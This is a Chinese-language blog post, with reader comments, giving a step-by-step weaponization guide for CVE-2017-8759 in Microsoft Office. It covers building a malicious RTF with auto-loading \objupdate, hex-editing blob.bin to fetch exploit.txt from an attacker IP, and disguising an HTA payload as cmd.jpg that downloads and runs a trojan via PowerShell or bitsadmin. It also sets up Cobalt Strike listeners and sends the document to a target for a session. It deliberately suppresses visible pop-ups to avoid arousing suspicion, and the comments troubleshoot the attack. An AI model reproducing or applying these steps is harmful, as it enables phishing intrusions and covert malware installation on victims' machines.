#Team: Cola-Lab

TIPS:

发现很多朋友在BIN to RTF那里出现了问题,本人修改了下别人的脚本,利用创建RTF的函数重写了一个脚本

CreateRTF.py

usage:Test.py -f filename – u url
filename: output file name
url: http[s]://example.com/exploit.txt

Python3编写,直接生成可用的RTF


 

前几天出的0DAY,搜了下,国内几乎没有人复现,这个洞总体来说,危害很大,而且比CVE-2017-0199更难防御。

漏洞成因分析:

360:一个换行符引发的奥斯卡0day漏洞(CVE-2017-8759)重现:最新的Office高级威胁攻击预警

FireEye:FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY

本人尝试了下复现,的确有很多坑!国外的大牛们也没有把利用方式说的很完善。

利用的文件:

本人整理的:

https://github.com/Lz1y/CVE-2017-8759

文件分别来自:

https://github.com/Voulnet/CVE-2017-8759-Exploit-sample

https://github.com/vysec/CVE-2017-8759

这次的攻击文件:cmd.hta exploit.txt  blob.bin

PS:cmd.hta中嵌入了VBS脚本,可以根据自己的需求更改内容(可以使用powershell直接下载并运行木马,也可以使用Windows中的bitsadmin下载木马运行)

我整理的HTA文件已经处理过啦~不会有HTA的白色闪烁,以及powershell的蓝色弹框。本机测试完全无任何怀疑点

然后将cmd.hta改名为cmd.jpg,并且修改当中的http://192.168.211.149:80为你的攻击IP

将exploit.txt中的URL同样修改成你的IP

利用工具:Cobal Strike,Office 2013,C32

选择Cobal Strike的原因是,因为这个漏洞需要搭建web服务,而Cobal Strike丰富的钓鱼模块正好满足了我们的需求

首先,打开Cobal Strike。

打开一个Listener(Cobal Strike = > Listener => add)

添加一个HTTPS的监听器,端口为443

然后Attacks=>Web Drive-by=> HOST file

TIM图片20170915084209.png

切记Mime设置为HTA,Launch

接着再来一次Attacks=>Web Drive-by=> HOST file

TIM图片20170915084744.png

接下来生成木马Attacks=>Web Drive-by=> Script Web Delivery

TIM图片20170915085410.png

点击Attacks=>Web Drive-by=> mange

查看当前的web页面~

TIM图片20170915085529.png

接下来就是制作钓鱼文档

打开office,本人装的是win7,所以是office2013.不过这个洞跟office版本没啥关系,在WPS中用户如果双击了图块,也是会造成漏洞的。

TIM图片20170915085823.png

插入对象

设置如下

TIM图片20170915085924.png

点击确定。另存为Doc3.rtf。注意!!!是rtf格式!!!不然后面步骤会失败!!!!!!

使用编辑器打开Doc3.rtf。找到{\object\objautlink\rsltpict\objw4321\objh4321

这一部分,修改为{\object\objupdate\objautlink\rsltpict\objw4321\objh4321

可以让文档自动加载payload~

然后C32打开blob.bin找到以下这一区

TIM图片20170915090413.png

修改十六进制部分,改为http://{攻击IP}/exploit.txt

我就改成http://192.168.211.149/exploit.txt

然后全选,反键拷贝为HEX格式化

替换Doc3.rtf中的

TIM图片20170915090758.png

替换掉objdata一直到}{\result 中间的所有十六进制数据

然后保存,这样子攻击文档就制作好了~

接下来将文档发送给目标

目标点击后

TIM图片20170915091027.png

无需点击是否

TIM图片20170915091101.png

得到了session~

因为修改了HTA部分,所以是不存在弹框闪烁的问题(可能会被杀软检测到),目前这个0day影响还是很大的。没有打补丁的小伙伴记得修复哦~





本文链接地址: CVE-2017-8759完美复现.并且解决HTA,POWERSHELL弹框闪烁

原创文章,转载请注明: 转载自Lz1y's Blog

55 thoughts on “CVE-2017-8759完美复现.并且解决HTA,POWERSHELL弹框闪烁

        1. 哪来的宏…我这个步骤也就多了一个制作恶意文档的步骤而已,没有这一步我本地就是复现失败的。

  1. 太难搞了 这个 复现 在 bin文件 哪里的格式复制到 rtf里面的 各种出错 根本 没法玩 bin文件的格式 并不适合 复制到rtf里面 得处理一下

    1. ok,知道了 ,高级,Hex编辑设置,拷贝设置,Hex格式化,在前面插入 ,那个空格去掉, -。- win10 rtf文档不会去请求自动请求expliot.txt

    1. 我测试过过程中也有换行与没有换行过,印象里面没有区别。你可以修改编辑器的设置,自动换行嘛

  2. “然后将cmd.hta改名为cmd.jpg,并且修改当中的http://192.168.211.149:80为你的攻击IP
    将exploit.txt中的URL同样修改成你的IP”

    这到底是什么ip???本地ip还是攻击目标的ip?????????

          1. 测试一直不成功 感觉可能是hex复制那里出了问题。对比了一下你的截图,我复制出的hex跟你截图中的差别很大

  3. 你好,请问生成rtf那个脚本是这样用吗 CreateRTF.py -f example.rtf -u http[s]://example.com/exploit.txt 怎么还是提示Help info

    1. fixed python 3 needed. but i dont understand, why i create rtf file using python, is this the exploit or file to send to the victim machine? iam confused.

        1. ok well, following my example using tryit.rtf created by python, after i must edit with a hex editor copy and paste into blob.bin just only the part where is http:// and use this full code so back again to tryit.rtf for copy all new content?.

          if you want can help via teamviewer please. iam not sure. thanks for helping me.

          1. my script is used to create a document that needn’t copy or paste hex(blob.bin).If you hava created a rtf,you can direct use this rtf document.

          2. youtube or github has many videos and scripts can help you 🙂 sorry ,I am very poor standard of English。

发表评论

电子邮件地址不会被公开。 必填项已用*标注

This site uses Akismet to reduce spam. Learn how your comment data is processed.